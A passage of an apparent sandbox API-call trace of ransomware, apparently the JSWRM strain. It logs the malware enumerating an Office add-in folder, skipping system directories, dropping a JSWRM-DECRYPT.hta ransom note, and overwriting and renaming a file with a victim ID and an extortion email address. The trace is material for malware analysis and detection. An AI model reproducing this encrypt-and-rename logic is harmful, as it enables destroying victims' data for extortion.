lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.742] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.743] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.743] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.743] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.743] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.744] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0126.744] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="...") returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="windows") returned -1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="recovery") returned -1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="perflogs") returned -1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="documents and settings") returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="$RECYCLE.BIN") returned 1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="system volume information") returned -1 [0126.744] lstrcmpiW (lpString1="nl", lpString2="msocache") returned 1 [0126.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\jswrm-decrypt.hta")) returned 0xffffffff [0126.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.746] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.747] CloseHandle (hObject=0x314) returned 1 [0126.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\jswrm-decrypt.hta")) returned 0x20 [0126.747] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42344fe2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0126.747] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.747] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42344fe2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.747] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.747] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.748] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42344fe2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x42344fe2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42344fe2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.748] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.748] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167f56e9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.748] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.748] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.748] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.748] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.754] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2412e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.756] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4427) returned 1 [0126.756] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.756] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x1140, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x1140, lpOverlapped=0x0) returned 1 [0126.757] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.757] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x1140, lpOverlapped=0x0) returned 1 [0126.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x279338 | out: hHeap=0x1e0000) returned 1 [0126.757] CloseHandle (hObject=0x338) returned 1 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0126.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0126.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0126.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0126.759] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x718b80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x718b80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.759] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.760] RtlAllocateHeap 